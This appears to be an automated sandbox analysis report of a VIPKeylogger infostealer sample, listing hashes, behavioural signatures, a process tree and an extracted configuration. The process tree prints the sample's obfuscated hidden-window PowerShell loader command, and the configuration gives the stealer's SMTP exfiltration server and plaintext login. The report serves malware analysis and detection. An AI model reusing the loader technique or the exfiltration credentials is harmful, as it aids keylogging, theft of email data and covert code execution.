Analysis
max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01-12-2024 16:06
Static task: static1
Behavioral task: behavioral1
  Sample: 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: Paraffinerer.ps1
  Resource: win7-20240903-en
Behavioral task: behavioral4
  Sample: Paraffinerer.ps1
  Resource: win10v2004-20241007-en
General
Target: 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
Size: 859KB
MD5: 47fd98348b7d314e4e9dae46e5f1e1a1
SHA1: cafe48404707e61235bfbe6646d8072af4298e21
SHA256: 125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
SHA512: 8a1deda7d7e8e80d8b2e62ad0d9d4400b1d865ea322955e577fc439a8a0f1d6d3cb912397ecb6458941fd7fd566c1fdbdf4c4ed02c72234fa543bfcb45db845a
SSDEEP: 12288:l9/IyjazmRR+BZhOLlpJjdCPwwdw6ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZzz:/A/KqZhOnJdyzp+alCJmvulW6Nd0vo
Malware Config
Extracted
  Protocol: smtp
  Host: smtp.ionos.es
  Port: 587
  Username: [email protected]
  Password: pW@4G()=#2
Extracted (vipkeylogger)
  Protocol: smtp
  Host: smtp.ionos.es
  Port: 587
  Username: [email protected]
  Password: pW@4G()=#2
  Email To: [email protected]
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was found in 2020.
Vipkeylogger family
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid   Process
1728  powershell.exe
1376  powershell.exe
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Key opened  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Key opened  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Blocklisted process makes network request 14 IoCs
flow  pid   Process
37    748   msiexec.exe
38    4644  msiexec.exe
40    4644  msiexec.exe
41    748   msiexec.exe
43    4644  msiexec.exe
44    748   msiexec.exe
46    4644  msiexec.exe
47    748   msiexec.exe
49    4644  msiexec.exe
50    748   msiexec.exe
55    748   msiexec.exe
57    748   msiexec.exe
60    748   msiexec.exe
64    748   msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow  ioc
37    drive.google.com
38    drive.google.com
36    drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
54    checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid   Process
4644  msiexec.exe
748   msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid   Process
1728  powershell.exe
1376  powershell.exe
748   msiexec.exe
4644  msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid   pid_target  Process       procid_target
1572  4644        WerFault.exe  94
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid   Process
1728  powershell.exe
1728  powershell.exe
1376  powershell.exe
1376  powershell.exe
1728  powershell.exe
1728  powershell.exe
1728  powershell.exe
1728  powershell.exe
1728  powershell.exe
1728  powershell.exe
1376  powershell.exe
1376  powershell.exe
1376  powershell.exe
1376  powershell.exe
1728  powershell.exe
1376  powershell.exe
748   msiexec.exe
748   msiexec.exe
Suspicious behavior: MapViewOfSection 2 IoCs
pid   Process
1728  powershell.exe
1376  powershell.exe
Suspicious use of AdjustPrivilegeToken 45 IoCs
description                          pid   Process
Token: SeDebugPrivilege              1728  powershell.exe
Token: SeDebugPrivilege              1376  powershell.exe
Token: SeIncreaseQuotaPrivilege      1728  powershell.exe
Token: SeSecurityPrivilege           1728  powershell.exe
Token: SeTakeOwnershipPrivilege      1728  powershell.exe
Token: SeLoadDriverPrivilege         1728  powershell.exe
Token: SeSystemProfilePrivilege      1728  powershell.exe
Token: SeSystemtimePrivilege         1728  powershell.exe
Token: SeProfSingleProcessPrivilege  1728  powershell.exe
Token: SeIncBasePriorityPrivilege    1728  powershell.exe
Token: SeCreatePagefilePrivilege     1728  powershell.exe
Token: SeBackupPrivilege             1728  powershell.exe
Token: SeRestorePrivilege            1728  powershell.exe
Token: SeShutdownPrivilege           1728  powershell.exe
Token: SeDebugPrivilege              1728  powershell.exe
Token: SeSystemEnvironmentPrivilege  1728  powershell.exe
Token: SeRemoteShutdownPrivilege     1728  powershell.exe
Token: SeUndockPrivilege             1728  powershell.exe
Token: SeManageVolumePrivilege       1728  powershell.exe
Token: 33                            1728  powershell.exe
Token: 34                            1728  powershell.exe
Token: 35                            1728  powershell.exe
Token: 36                            1728  powershell.exe
Token: SeIncreaseQuotaPrivilege      1376  powershell.exe
Token: SeSecurityPrivilege           1376  powershell.exe
Token: SeTakeOwnershipPrivilege      1376  powershell.exe
Token: SeLoadDriverPrivilege         1376  powershell.exe
Token: SeSystemProfilePrivilege      1376  powershell.exe
Token: SeSystemtimePrivilege         1376  powershell.exe
Token: SeProfSingleProcessPrivilege  1376  powershell.exe
Token: SeIncBasePriorityPrivilege    1376  powershell.exe
Token: SeCreatePagefilePrivilege     1376  powershell.exe
Token: SeBackupPrivilege             1376  powershell.exe
Token: SeRestorePrivilege            1376  powershell.exe
Token: SeShutdownPrivilege           1376  powershell.exe
Token: SeDebugPrivilege              1376  powershell.exe
Token: SeSystemEnvironmentPrivilege  1376  powershell.exe
Token: SeRemoteShutdownPrivilege     1376  powershell.exe
Token: SeUndockPrivilege             1376  powershell.exe
Token: SeManageVolumePrivilege       1376  powershell.exe
Token: 33                            1376  powershell.exe
Token: 34                            1376  powershell.exe
Token: 35                            1376  powershell.exe
Token: 36                            1376  powershell.exe
Token: SeDebugPrivilege              748   msiexec.exe
Suspicious use of WriteProcessMemory 14 IoCs
description                       pid   Process                                                                   procid_target
PID 4948 wrote to memory of 1728  4948  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe  83
PID 4948 wrote to memory of 1728  4948  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe  83
PID 4948 wrote to memory of 1728  4948  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe  83
PID 4948 wrote to memory of 1376  4948  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe  85
PID 4948 wrote to memory of 1376  4948  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe  85
PID 4948 wrote to memory of 1376  4948  125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe  85
PID 1728 wrote to memory of 4644  1728  powershell.exe                                                            94
PID 1728 wrote to memory of 4644  1728  powershell.exe                                                            94
PID 1728 wrote to memory of 4644  1728  powershell.exe                                                            94
PID 1728 wrote to memory of 4644  1728  powershell.exe                                                            94
PID 1376 wrote to memory of 748   1376  powershell.exe                                                            95
PID 1376 wrote to memory of 748   1376  powershell.exe                                                            95
PID 1376 wrote to memory of 748   1376  powershell.exe                                                            95
PID 1376 wrote to memory of 748   1376  powershell.exe                                                            95
outlook_office_path 1 IoCs
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
outlook_win_path 1 IoCs
description  ioc  Process
Key opened  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
Processes
C:\Users\Admin\AppData\Local\Temp\125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe (PID 4948)
  Command line: "C:\Users\Admin\AppData\Local\Temp\125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1728)
    Command line: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\msiexec.exe (PID 4644)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      C:\Windows\SysWOW64\WerFault.exe (PID 1572)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 1648
        - Program crash
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1376)
    Command line: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\msiexec.exe (PID 748)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
C:\Windows\SysWOW64\WerFault.exe (PID 1868)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4644 -ip 4644
Network
MITRE ATT&CK Enterprise v15
Downloads